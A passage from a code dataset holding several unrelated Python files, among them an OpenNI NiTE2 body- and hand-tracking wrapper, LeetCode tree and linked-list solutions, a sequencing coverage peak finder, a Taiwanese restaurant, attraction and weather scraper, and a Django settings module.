param=param)\n","repo_name":"JxcChen/WE_UI","sub_path":"my_client/client_10/public/xls_to_script.py","file_name":"xls_to_script.py","file_ext":"py","file_size_in_byte":5878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22104217706","text":"# pylint: disable=W0212,W0603\n\nimport sys\nimport os\nimport weakref\nimport atexit\nimport ctypes\nimport platform\nfrom openni import _nite2 as c_api\nfrom openni import openni2\nfrom openni.utils import inherit_properties, ClosedHandle, HandleObject, InitializationError\n\nfrom openni._nite2 import NiteJointType as JointType\nfrom openni._nite2 import NiteSkeletonState as SkeletonState\nfrom openni._nite2 import NiteUserState as UserState\nfrom openni._nite2 import NitePoseType as PoseType\nfrom openni._nite2 import NiteGestureType as GestureType\n\narch = int(platform.architecture()[0].lower().replace(\"bit\", \"\"))\n\n_default_dll_directories = []\nif arch == 32:\n    if \"NITE2_REDIST\" in os.environ:\n        _default_dll_directories.append(os.environ[\"NITE2_REDIST\"])\nelif arch == 64:\n    if \"NITE2_REDIST64\" in os.environ:\n        _default_dll_directories.append(os.environ[\"NITE2_REDIST64\"])\n    elif \"NITE2_REDIST\" in os.environ:\n        _default_dll_directories.append(os.environ[\"NITE2_REDIST\"])\n\n_default_dll_directories.append(\".\")\n\nif sys.platform == \"win32\":\n    _dll_name = \"NiTE2.dll\"\nelif sys.platform == \"darwin\":\n    _dll_name = \"libNiTE2.dylib\"\nelse:\n    _dll_name = \"libNiTE2.so\"\n\n\n_nite2_initialized 
= False\nloaded_dll_directory = None\n\n\ndef initialize(dll_directories=_default_dll_directories):\n global _nite2_initialized\n global loaded_dll_directory\n if _nite2_initialized:\n return\n if isinstance(dll_directories, str):\n dll_directories = [dll_directories]\n\n if not openni2.is_initialized():\n openni2.initialize()\n\n if loaded_dll_directory:\n c_api.niteInitialize()\n _nite2_initialized = True\n return\n\n found = False\n prev = os.getcwd()\n exceptions = []\n dll_directories = [os.path.normpath(os.path.abspath(d)) for d in dll_directories]\n\n for dlldir in dll_directories:\n if not os.path.isdir(dlldir):\n exceptions.append((dlldir, \"Directory does not exist\"))\n continue\n fullpath = os.path.join(dlldir, _dll_name)\n if not os.path.isfile(fullpath):\n exceptions.append((fullpath, \"file does not exist\"))\n continue\n try:\n os.chdir(dlldir)\n c_api.load_dll(fullpath)\n c_api.niteInitialize()\n except Exception as ex:\n exceptions.append((fullpath, ex))\n else:\n found = True\n loaded_dll_directory = dlldir\n break\n\n os.chdir(prev)\n if not found:\n raise InitializationError(\"NiTE2 could not be loaded:\\n %s\" %\n (\"\\n \".join(\"%s: %s\" % (dir, ex) for dir, ex in exceptions)),)\n\n _nite2_initialized = True\n\n\ndef is_initialized():\n return _nite2_initialized\n\n\n_registered_user_trackers = weakref.WeakSet()\n_registered_user_tracker_frames = weakref.WeakSet()\n_registered_hand_trackers = weakref.WeakSet()\n_registered_hand_tracker_frames = weakref.WeakSet()\n_registered_user_tracker_listeners = weakref.WeakSet()\n_registered_hand_tracker_listeners = weakref.WeakSet()\n\n\ndef unload():\n global _nite2_initialized\n if not _nite2_initialized:\n return\n for coll in [_registered_user_tracker_frames, _registered_hand_tracker_frames, _registered_hand_trackers,\n _registered_user_trackers, _registered_user_tracker_listeners, _registered_hand_tracker_listeners]:\n for hndl in coll:\n hndl.close()\n coll.clear()\n\n _nite2_initialized = False\n c_api.niteShutdown()\n\n\natexit.register(unload)\n\n\ndef get_version():\n return c_api.niteGetVersion()\n\n\nPoint3f = c_api.NitePoint3f\nPlane = c_api.NitePlane\nQuaternion = c_api.NiteQuaternion\nBoundingBox = c_api.NiteBoundingBox\nUserId = c_api.NiteUserId\nHandId = c_api.NiteHandId\nUserMap = c_api.NiteUserMap\nSkeletonJoint = c_api.NiteSkeletonJoint\n\n\n@inherit_properties(c_api.NitePoseData, \"_posedata\")\nclass PoseData(object):\n __slots__ = [\"_posedata\"]\n\n def __init__(self, posedata):\n self._posedata = posedata\n\n def is_held(self):\n return self.state == c_api.NitePoseState.NITE_POSE_STATE_IN_POSE\n\n def is_entered(self):\n return self.state == c_api.NitePoseState.NITE_POSE_STATE_ENTER\n\n def is_exited(self):\n return self.state == c_api.NitePoseState.NITE_POSE_STATE_EXIT\n\n\n@inherit_properties(c_api.NiteSkeleton, \"_skeleton\")\nclass Skeleton(object):\n __slots__ = [\"_skeleton\"]\n\n def __init__(self, skeleton):\n self._skeleton = skeleton\n\n def get_joint(self, jointtype):\n return self.joints[jointtype]\n\n\n@inherit_properties(c_api.NiteUserData, \"_userdata\")\nclass UserData(object):\n __slots__ = [\"_userdata\"]\n\n def __init__(self, userdata):\n self._userdata = userdata\n\n def is_new(self):\n return self.state == c_api.NiteUserState.NITE_USER_STATE_NEW\n\n def is_visible(self):\n return self.state == c_api.NiteUserState.NITE_USER_STATE_VISIBLE\n\n def is_lost(self):\n return self.state == c_api.NiteUserState.NITE_USER_STATE_LOST\n\n def get_pose(self, posetype):\n return 
PoseData(self.poses[posetype])\n\n\n@inherit_properties(c_api.NiteUserTrackerFrame, \"_frame\")\nclass UserTrackerFrame(HandleObject):\n    __slots__ = [\"_frame\", \"_user_tracker_handle\", \"_depth_frame\", \"users\", \"users_by_id\", \"__weakref__\"]\n\n    def __init__(self, pframe, user_tracker_handle):\n        self._frame = pframe[0]\n        self._user_tracker_handle = user_tracker_handle\n        self._depth_frame = None\n        c_api.niteUserTrackerFrameAddRef(user_tracker_handle, pframe)\n        HandleObject.__init__(self, pframe)\n        self.users = []\n        self.users_by_id = {}\n        for i in range(self.userCount):\n            u = UserData(self.pUser[i])\n            self.users.append(u)\n            self.users_by_id[u.id] = u\n        _registered_user_tracker_frames.add(self)\n\n    def _close(self):\n        if is_initialized():\n            c_api.niteUserTrackerFrameRelease(self._user_tracker_handle, self._handle)\n        self._frame = ClosedHandle\n        self._user_tracker_handle = ClosedHandle\n        del self.users[:]\n\n    def get_depth_frame(self):\n        if self._depth_frame is None:\n            self._depth_frame = openni2.VideoFrame(self.pDepthFrame)\n        return self._depth_frame\n\n\nclass _NiteDevStruct(ctypes.Structure):\n    \"\"\"\n    PlaybackControl* m_pPlaybackControl;\n\n    OniDeviceHandle m_device;\n    DeviceInfo m_deviceInfo;\n    SensorInfo m_aSensorInfo[ONI_MAX_SENSORS];\n\n    bool m_isOwner;\n    \"\"\"\n\n    _fields_ = [\n        (\"pPlaybackControl\", ctypes.c_void_p),\n        (\"device\", openni2.c_api.OniDeviceHandle),\n\n        (\"device_info\", openni2.c_api.OniDeviceInfo),\n        (\"sensor_info\", openni2.c_api.OniSensorInfo * 10),\n\n        (\"is_owner\", ctypes.c_bool)\n    ]\n\n\nclass UserTracker(HandleObject):\n    def __init__(self, device):\n        handle = c_api.NiteUserTrackerHandle()\n        if not device:\n            c_api.niteInitializeUserTracker(ctypes.byref(handle))\n        else:\n            self._devstruct = _NiteDevStruct()\n            self._devstruct.pPlaybackControl = None\n            self._devstruct.device = device._handle\n            self._devstruct.device_info = device.get_device_info()\n            # self._devstruct.sensor_info = device.get_sensor_infos(sensor_type)\n            self._devstruct.is_owner = True\n            c_api.niteInitializeUserTrackerByDevice(ctypes.byref(self._devstruct), ctypes.byref(handle))\n\n        HandleObject.__init__(self, handle)\n        _registered_user_trackers.add(self)\n\n    @classmethod\n    def open_any(cls):\n        return UserTracker(None)\n\n    def _close(self):\n        if is_initialized():\n            c_api.niteShutdownUserTracker(self._handle)\n\n    def read_frame(self):\n        pnf = ctypes.POINTER(c_api.NiteUserTrackerFrame)()\n        c_api.niteReadUserTrackerFrame(self._handle, ctypes.byref(pnf))\n        return UserTrackerFrame(pnf, self._handle)\n\n    def set_skeleton_smoothing_factor(self, factor):\n        return c_api.niteSetSkeletonSmoothing(self._handle, factor)\n\n    def get_skeleton_smoothing_factor(self):\n        factor = ctypes.c_float()\n        c_api.niteGetSkeletonSmoothing(self._handle, ctypes.byref(factor))\n        return factor.value\n    skeleton_smoothing_factor = property(get_skeleton_smoothing_factor, set_skeleton_smoothing_factor)\n\n    def start_skeleton_tracking(self, userid):\n        c_api.niteStartSkeletonTracking(self._handle, userid)\n\n    def stop_skeleton_tracking(self, userid):\n        c_api.niteStopSkeletonTracking(self._handle, userid)\n\n    def is_tracking(self, userid):\n        return c_api.niteIsSkeletonTracking(self._handle, userid)\n\n    def start_pose_detection(self, userid, posetype):\n        c_api.niteStartPoseDetection(self._handle, userid, posetype)\n\n    def stop_pose_detection(self, userid, posetype):\n        c_api.niteStopPoseDetection(self._handle, userid, posetype)\n\n    def stop_all_pose_detection(self, userid):\n        c_api.niteStopAllPoseDetection(self._handle, userid)\n\n    
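# The coordinate converters below wrap NiTE's projection helpers: skeleton\n    # joint positions arrive in real-world millimeters and must be mapped to\n    # depth-pixel (x, y) coordinates before they can be drawn over a depth map.\n    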
def convert_joint_coordinates_to_depth(self, x, y, z):\n outX = ctypes.c_float()\n outY = ctypes.c_float()\n c_api.niteConvertJointCoordinatesToDepth(self._handle, x, y, z, ctypes.byref(outX), ctypes.byref(outY))\n return (outX.value, outY.value)\n\n def convert_depth_coordinates_to_joint(self, x, y, z):\n outX = ctypes.c_float()\n outY = ctypes.c_float()\n c_api.niteConvertDepthCoordinatesToJoint(self._handle, x, y, z, ctypes.byref(outX), ctypes.byref(outY))\n return (outX.value, outY.value)\n\n\n@inherit_properties(c_api.NiteGestureData, \"_gesture\")\nclass GestureData(object):\n def __init__(self, gesture):\n self._gesture = gesture\n\n def is_complete(self):\n return self.state == c_api.NiteGestureState.NITE_GESTURE_STATE_COMPLETED\n\n def is_in_progress(self):\n return self.state == c_api.NiteGestureState.NITE_GESTURE_STATE_IN_PROGRESS\n\n\n@inherit_properties(c_api.NiteHandData, \"_handdata\")\nclass HandData(object):\n def __init__(self, handdata):\n self._handdata = handdata\n\n def is_new(self):\n return self.state == c_api.NiteHandState.NITE_HAND_STATE_NEW\n\n def is_lost(self):\n return self.state == c_api.NiteHandState.NITE_HAND_STATE_LOST\n\n def is_tracking(self):\n return self.state == c_api.NiteHandState.NITE_HAND_STATE_TRACKED\n\n def is_touching_fov(self):\n return self.state == c_api.NiteHandState.NITE_HAND_STATE_TOUCHING_FOV\n\n\n@inherit_properties(c_api.NiteHandTrackerFrame, \"_frame\")\nclass HandTrackerFrame(HandleObject):\n def __init__(self, hand_tracker_handle, pframe):\n self._hand_tracker_handle = hand_tracker_handle\n self._frame = pframe[0]\n c_api.niteHandTrackerFrameAddRef(hand_tracker_handle, pframe)\n HandleObject.__init__(self, pframe)\n self._depth_frame = None\n self._hands = None\n self._gestures = None\n _registered_hand_tracker_frames.add(self)\n\n def _close(self):\n if is_initialized():\n c_api.niteHandTrackerFrameRelease(self._hand_tracker_handle, self._handle)\n\n @property\n def depth_frame(self):\n if self._depth_frame is None:\n self._depth_frame = openni2.VideoFrame(self._frame.pDepthFrame)\n return self._depth_frame\n\n @property\n def hands(self):\n if self._hands is None:\n self._hands = [self._frame.pHands[i] for i in range(self._frame.handCount)]\n return self._hands\n\n @property\n def gestures(self):\n if self._gestures is None:\n self._gestures = [self._frame.pGestures[i] for i in range(self._frame.gestureCount)]\n return self._gestures\n\n\nclass HandTracker(HandleObject):\n def __init__(self, device):\n self.device = device\n handle = c_api.NiteHandTrackerHandle()\n if not device:\n c_api.niteInitializeHandTracker(ctypes.byref(handle))\n else:\n self._devstruct = _NiteDevStruct()\n self._devstruct.device = device._handle\n c_api.niteInitializeHandTrackerByDevice(ctypes.byref(self._devstruct), ctypes.byref(handle))\n HandleObject.__init__(self, handle)\n _registered_hand_trackers.add(self)\n\n @classmethod\n def open_any(cls):\n return cls(None)\n\n def _close(self):\n if is_initialized():\n c_api.niteShutdownHandTracker(self._handle)\n\n def read_frame(self):\n pfrm = ctypes.POINTER(c_api.NiteHandTrackerFrame)()\n c_api.niteReadHandTrackerFrame(self._handle, ctypes.byref(pfrm))\n return HandTrackerFrame(self._handle, pfrm)\n\n def set_smoothing_factor(self, factor):\n c_api.niteSetHandSmoothingFactor(self._handle, factor)\n\n def get_smoothing_factor(self):\n factor = ctypes.c_float()\n c_api.niteGetHandSmoothingFactor(self._handle, ctypes.byref(factor))\n return factor.value\n smoothing_factor = property(get_smoothing_factor, 
set_smoothing_factor)\n\n def start_hand_tracking(self, *position):\n new_hand_id = HandId()\n if len(position) == 3:\n position = Point3f(*position)\n elif len(position) == 1:\n position = position[0]\n else:\n raise TypeError(\"Either Point3f or three values required\")\n c_api.niteStartHandTracking(self._handle, ctypes.byref(position), ctypes.byref(new_hand_id))\n return new_hand_id\n\n def stop_hand_tracking(self, handid):\n c_api.niteStopHandTracking(self._handle, handid)\n\n def start_gesture_detection(self, gesture_type):\n c_api.niteStartGestureDetection(self._handle, gesture_type)\n\n def stop_gesture_detection(self, gesture_type):\n c_api.niteStopGestureDetection(self._handle, gesture_type)\n\n def convert_hand_coordinates_to_depth(self, x, y, z):\n outX = ctypes.c_float()\n outY = ctypes.c_float()\n c_api.niteConvertHandCoordinatesToDepth(self._handle, x, y, z, ctypes.byref(outX), ctypes.byref(outY))\n return outX.value, outY.value\n\n def convert_depth_coordinates_to_hand(self, x, y, z):\n outX = ctypes.c_float()\n outY = ctypes.c_float()\n c_api.niteConvertDepthCoordinatesToHand(self._handle, x, y, z, ctypes.byref(outX), ctypes.byref(outY))\n return outX.value, outY.value\n\n def stop_all_hand_tracking(self):\n c_api.niteStopAllHandTracking(self._handle)\n\n def stop_all_gesture_detection(self):\n c_api.niteStopAllGestureDetection(self._handle)\n\n\nclass UserTrackerListener(HandleObject):\n def __init__(self, user_tracker):\n self.user_tracker = user_tracker\n self._callbacks = c_api.NiteUserTrackerCallbacks(\n readyForNextFrame=c_api.OniGeneralCallback(self._on_ready_for_next_frame))\n handle = ctypes.pointer(self._callbacks)\n c_api.niteRegisterUserTrackerCallbacks(self.user_tracker._handle, handle, None)\n HandleObject.__init__(self, handle)\n _registered_user_tracker_listeners.add(self)\n\n def unregister(self):\n self.close()\n\n def _close(self):\n if is_initialized():\n c_api.niteUnregisterUserTrackerCallbacks(self.user_tracker._handle, self._handle)\n self.user_tracker = None\n\n def _on_ready_for_next_frame(self, _):\n self.on_ready_for_next_frame()\n\n def on_ready_for_next_frame(self):\n \"\"\"Implement me\"\"\"\n pass\n\n\nclass HandTrackerListener(HandleObject):\n def __init__(self, hand_tracker):\n self.hand_tracker = hand_tracker\n self._callbacks = c_api.NiteHandTrackerCallbacks(\n readyForNextFrame=c_api.OniGeneralCallback(self._on_ready_for_next_frame))\n handle = ctypes.pointer(self._callbacks)\n c_api.niteRegisterHandTrackerCallbacks(self.hand_tracker._handle, handle, None)\n HandleObject.__init__(self, handle)\n _registered_hand_tracker_listeners.add(self)\n\n def _close(self):\n if is_initialized():\n c_api.niteUnregisterHandTrackerCallbacks(self.hand_tracker._handle, self._handle)\n self.hand_tracker = None\n\n def _on_ready_for_next_frame(self, _):\n self.on_ready_for_next_frame()\n\n def on_ready_for_next_frame(self):\n \"\"\"Implement me\"\"\"\n pass\n","repo_name":"severin-lemaignan/openni-python","sub_path":"openni/nite2.py","file_name":"nite2.py","file_ext":"py","file_size_in_byte":16194,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"37"} +{"seq_id":"22239624241","text":"# Definition for a binary tree node\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n # @param root, a tree node\n # @return a list of integers\n def postorderTraversal(self, root):\n nodes = []\n def postorderTraversalHelper(root, nodes):\n if root:\n 
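# Post-order traversal: visit the left subtree, then the right subtree, then the node itself.\n                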
postorderTraversalHelper(root.left, nodes)\n                postorderTraversalHelper(root.right, nodes)\n                nodes.append(root.val)\n        postorderTraversalHelper(root, nodes)\n        return nodes\n\nclass Solution2:\n    # @param root, a tree node\n    # @return a list of integers\n    def postorderTraversal(self, root):\n        nodes = []\n        if not root:\n            return nodes\n        stack = [root]\n        while stack:\n            node = stack.pop()\n            nodes.append(node.val)\n            if node.left:\n                stack.append(node.left)\n            if node.right:\n                stack.append(node.right)\n        return nodes[-1::-1]","repo_name":"zhexiong/LTC","sub_path":"binary_tree_postorder_traversal.py","file_name":"binary_tree_postorder_traversal.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12917106509","text":"import pandas as pd\nimport peakutils\nimport numpy as np\nfrom matplotlib import pyplot\nimport multiprocessing\n\n\nfile='/hpc/hub_oudenaarden/edann/VAN1667_depth.bed'\n\ndef findPeaks(cov):\n    \"\"\"\n    detects peaks in depth.bed file (use small chunks)\n    returns df in bed format of 1 kb region around detected peaks\n    \"\"\"\n    chr=np.array([])\n    x=np.array([])\n    y=np.array([])\n    chrom=cov.chrom[0]\n    for i in range(min(cov.start), max(cov.end)):\n        df=cov[(cov.start <= i) & (cov.end > i)]\n        if df.empty:\n            x=np.append(x, i)\n            y=np.append(y, 0)\n        else:\n            x=np.append(x,i)\n            y=np.append(y,df.depth)\n            chrom=df.chrom\n        chr=np.append(chr, chrom)\n    complCov=pd.DataFrame({\"pos\":x,\"depth\":y, \"chrom\":chr})\n    complCov['runmeanDepth']=complCov.depth.rolling(500).mean()  # 500-position running mean (pd.rolling_mean is gone from modern pandas)\n    pyplot.plot(complCov.pos, complCov.runmeanDepth)\n    pyplot.plot(complCov.pos, complCov.depth)\n    pyplot.show()\n    indexes = peakutils.indexes(complCov.runmeanDepth, thres=0.5, min_dist=1000)\n#    pplot(complCov.pos, complCov.runmeanDepth, indexes)\n#    pyplot.show()\n    peaks = complCov.iloc()[indexes]\n    peaksBed = pd.DataFrame({'chrom':peaks.chrom, 'start':peaks.pos-500, 'end':peaks.pos+500, 'cov':peaks.depth})\n    return(peaksBed)\n\ndef read_in_chunks(file, chunk_size=1000):\n    \"\"\"Lazy function (generator) to read a file piece by piece.\n    Default chunk size: 1k.\"\"\"\n    firstrow = 0\n    while True:\n        data = pd.read_csv(file, header=None, skiprows=firstrow, nrows=chunk_size, names=['chrom', 'start', 'end', 'depth' ], sep='\\t')\n        firstrow = firstrow+chunk_size\n        if data.empty:\n            break\n        yield data\n\n\nworkers = multiprocessing.Pool(10)\np=pd.DataFrame([])\nfor peaks in workers.map(findPeaks, [ cov for cov in read_in_chunks(file)]):\n    p=p.append(peaks)\n\np.to_csv('VAN1667_depth_peaks.csv')\n","repo_name":"emdann/HexamerBias","sub_path":"thrashNsnippets/coverage_peaks/findCoveragePeaks.py","file_name":"findCoveragePeaks.py","file_ext":"py","file_size_in_byte":1898,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"39105951208","text":"from bs4 import BeautifulSoup\nimport requests\nfrom fake_useragent import UserAgent\nfrom abc import ABC, abstractmethod\nimport time\n\nua = UserAgent() \nuser_agent = UserAgent()\n\n\nclass function(ABC):\n\n    @abstractmethod\n    def crawler(self):\n        pass\n\n\nclass IFoodie(function):\n\n    def crawler(self, area):\n        # IFoodie restaurant review site (ifoodie.tw)\n        url = \"https://ifoodie.tw/explore/\" + area + \\\n            \"/list?sortby=popular&opening=true\"\n        \n        response = requests.get(url = url, headers = {\"user-agent\" : user_agent.random})\n        \n        soup = BeautifulSoup(response.content, \"html.parser\")\n\n        cards = soup.find_all('div', {'class': 'jsx-1156793088 restaurant-info'}, 
limit=10)\n\n content = \"\"\n for card in cards:\n \n title = card.find( # 餐廳名稱\n \"a\", {\"class\": \"jsx-1156793088 title-text\"}).getText()\n\n stars = card.find( # 餐廳評價\n \"div\", {\"class\": \"jsx-2373119553 text\"}).getText()\n \n address = card.find( # 餐廳地址\n \"div\", {\"class\": \"jsx-1156793088 address-row\"}).getText()\n \n \n #將取得的餐廳名稱、評價及地址連結一起,並且指派給content變數\n content += f\"{title} - {stars}顆星 \\n{address} \\n\\n\"\n \n return content\n\n\n\n\nclass okgo(function):\n\n def crawler(self, area):\n # okgo 玩全台灣\n url = \"https://okgo.tw/Search.html?Page=1&kw=\" + area + \"&st=1\"\n response = requests.get(url = url, headers = {\"user-agent\" : user_agent.random})\n \n soup = BeautifulSoup(response.content, \"html.parser\") \n\n cards = soup.find_all('li', {'id': 'Search_Content_li'}, limit=5)\n\n content = \"\"\n for card in cards:\n web_address = card.find('a', {'class' : 'STopic'})\n\n url = \"https://okgo.tw/\" + web_address[\"href\"]\n \n response = requests.get(url = url, headers = {\"user-agent\" : user_agent.random})\n\n soup = BeautifulSoup(response.content, \"html.parser\") \n\n information = soup.find('div', {'class' : 'sec3 word Resize'})\n\n title = information.find('h2', {'style' : 'color:#40a0bf;'}).getText()\n\n zone_list = information.find('strong').find_all('a')\n zone = \"\"\n for zones in zone_list: zone += zones.text\n\n TransInfo = soup.find('div', {'id' : 'Buty_View_Traffic'}).getText()\n\n\n content += f\"{title} - {zone}\\n\\n{TransInfo}\\n\\n\"\n\n\n return content\n\n\nclass weather(function): \n\n def crawler(self, area):\n\n city_web = {\"台北市\" : \"https://weather.com/zh-TW/weather/hourbyhour/l/6b221b26e046a442e03dc46fbe91d5874c6461afde61187dd4126bddeea1e2aa\",\n \"基隆市\" : \"https://weather.com/zh-TW/weather/hourbyhour/l/7a1bd787c9a5bfd8b7290f325ea531127a0447198d4c09689f6cf12f4421a110a042adb62e0ce6b4ee0110784300e689\",\n \"台南市\" : \"https://weather.com/zh-TW/weather/hourbyhour/l/cb9a4442e9bf7da0ece89bd21a5161210e79cccc0ec2647b3565977e7a278c31\",\n \"新北市\" : \"\",\n \"台中市\" : \"https://weather.com/zh-TW/weather/hourbyhour/l/8e095973cc14ab3966eab1a0c6a1b04f5291e61049bff4cb42a510b3881afec9\",\n \"桃園市\" : \"https://weather.com/zh-TW/weather/hourbyhour/l/efbf308224729b20c95ff9150f731657639bc63cce74c8c098357587b7bbc9c4\",\n \"台南市\" : \"https://weather.com/zh-TW/weather/hourbyhour/l/cb9a4442e9bf7da0ece89bd21a5161210e79cccc0ec2647b3565977e7a278c31\",\n \"高雄市\" : \"https://weather.com/zh-TW/weather/hourbyhour/l/48697cc4c9743031df643ebe553fc08fd83bf2e96d7c7f58c0db435d5888131f\",\n \"彰化縣\" : \"https://weather.com/zh-TW/weather/hourbyhour/l/50f0afa948f93e0309ee2f37a6d34beaf66a79e423e4dec6b9bc063ce8d993c8\",\n \"新竹縣\" : \"https://weather.com/zh-TW/weather/hourbyhour/l/9d98eb3f97a83330c0599a7548c3c7b47163615858673cfee2406e208ce20604\",\n \"苗栗縣\" : \"https://weather.com/zh-TW/weather/hourbyhour/l/b994c89cc0ff3b6b56814e2730a58c821d2585ce6d3f190ea6a8c502c82268c2\",\n \"彰化縣\" : \"https://weather.com/zh-TW/weather/hourbyhour/l/50f0afa948f93e0309ee2f37a6d34beaf66a79e423e4dec6b9bc063ce8d993c8\",\n \"南投縣\" : \"https://weather.com/zh-TW/weather/hourbyhour/l/d8b83853a6cc59e5bb3fe1e512cc4be8a3e5c1842889f42c5272bc1b14c2abb9\",\n \"雲林縣\" : \"https://weather.com/zh-TW/weather/hourbyhour/l/ab23a82e059d89c364a0761975f05b158a4f996296055be39fea254d3ae8b053\",\n \"嘉義縣\" : \"https://weather.com/zh-TW/weather/hourbyhour/l/083ec430bd75b8e34579f93ce7c6c033e47d58eca20302a4ede6e3914cd1150a\",\n \"屏東縣\" : 
\"https://weather.com/zh-TW/weather/hourbyhour/l/2303e8481a2d2f9b32e5343dc3661a921123f3ccdd277563e4b6d7771d53a244\",\n \"台東縣\" : \"\",\n \"宜蘭縣\" : \"https://weather.com/zh-TW/weather/hourbyhour/l/509a0202845cfc5a9b7e8c39e61323b593893292803d99c5fa3fe0f572f2ddff\",\n \"花蓮縣\" : \"https://weather.com/zh-TW/weather/hourbyhour/l/6e37fc12427c24cb9ae8e50a596754434e8244b28c1a3d25b8122fb3a0dca2f6\",\n \"新竹市\" : \"https://weather.com/zh-TW/weather/hourbyhour/l/9d98eb3f97a83330c0599a7548c3c7b47163615858673cfee2406e208ce20604\",\n \"嘉義市\" : \"https://weather.com/zh-TW/weather/hourbyhour/l/083ec430bd75b8e34579f93ce7c6c033e47d58eca20302a4ede6e3914cd1150a\",\n \n }\n\n url = city_web[area]\n\n user_agent = UserAgent()\n\n response = requests.get(url=url, headers={\"user-agent\": user_agent.random})\n\n soup = BeautifulSoup(response.content, \"html.parser\")\n\n cards = soup.find_all(\n \"div\", {\"class\": \"DetailsSummary--DetailsSummary--1DqhO\"}, limit=15)\n\n content = f\"{area}每日天氣\\n\\n\"\n for card in cards:\n\n times = card.find(\n \"h3\", {\"class\": \"DetailsSummary--daypartName--kbngc\"}).getText()\n\n if times == \"00:00\": break # breakpoint\n\n temprature = card.find(\"span\", {\"class\": \"DetailsSummary--tempValue--jEiXE\"}).getText()\n\n status = card.find(\"span\", {\"class\": \"DetailsSummary--extendedData--307Ax\"}).getText()\n\n rain_prob = card.find(\"span\", {\"data-testid\": \"PercentageValue\"}).getText()\n\n content += f\"時間:{times}\\n氣溫:{temprature}\\n天氣狀況:{status}\\n降雨機率:{rain_prob}\\n\\n\"\n \n\n return content\n \n\n","repo_name":"vicwen0418/Line-Assistant-Bot","sub_path":"AssistantBot/assistantbot/crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":6652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34425157528","text":"# Link : https://leetcode.com/problems/reverse-linked-list/description/\n# Author : Mohamed Ibrahim\n\n \nclass Solution:\n def reverseList(self, head: Optional[ListNode]) -> Optional[ListNode]:\n curr = head\n pre = None\n nxt = None\n while(curr):\n nxt = curr.next # hold the next address of curr\n curr.next = pre # connect current to pre \" <- \" (reverse node)\n pre = curr # move previous\n curr = nxt # move curr \n \n return pre\n \n \n \n","repo_name":"M0hamedIbrahim1/-Data-Structure-Algorithms","sub_path":"LinkedList/Problems/206. Reverse Linked List.py","file_name":"206. 
Reverse Linked List.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"19195512799","text":"# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\n\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom .utils import get_env_variable\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = get_env_variable(\"SECRET_KEY\")\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = False\n\nALLOWED_HOSTS = []\n\n# Application definition\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'crispy_forms',\n 'master_data',\n 'back_office',\n 'students',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.locale.LocaleMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n 'django.middleware.security.SecurityMiddleware',\n)\n\nROOT_URLCONF = 'halaqat.urls'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': ['templates'],\n 'APP_DIRS': True,\n 'OPTIONS': {\n # 'loaders': [\n # (\n # 'django.template.loaders.cached.Loader', [\n # 'django.template.loaders.filesystem.Loader',\n # 'django.template.loaders.app_directories.Loader',\n # ]\n # ),\n # ],\n 'context_processors': [\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n 'django.template.context_processors.media',\n 'django.template.context_processors.i18n',\n ],\n },\n },\n]\n\nWSGI_APPLICATION = 'halaqat.wsgi.application'\n\n# Database\n# https://docs.djangoproject.com/en/1.8/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),\n }\n}\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.8/topics/i18n/\n\nLANGUAGE_CODE = 'en'\n\nTIME_ZONE = 'Asia/Kuwait'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\nLANGUAGES = (\n ('ar', _('Arabic')),\n ('en', _('English')),\n )\n\nLOCALE_PATHS = (\n os.path.join(BASE_DIR, \"locale\"),\n)\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.8/howto/static-files/\n\nSTATIC_URL = '/static/'\n\nSTATICFILES_DIRS = (\n os.path.join(BASE_DIR, \"static\"),\n)\n\n# Crispy Forms\n\nCRISPY_TEMPLATE_PACK = 'bootstrap3'\n\nLOGIN_REDIRECT_URL = '/'\nLOGIN_URL = '/login'\n","repo_name":"EmadMokhtar/halaqat","sub_path":"halaqat/settings/base_settings.py","file_name":"base_settings.py","file_ext":"py","file_size_in_byte":3249,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"30263872723","text":"import datetime\r\nimport json\r\nfrom datetime import timedelta\r\nfrom 
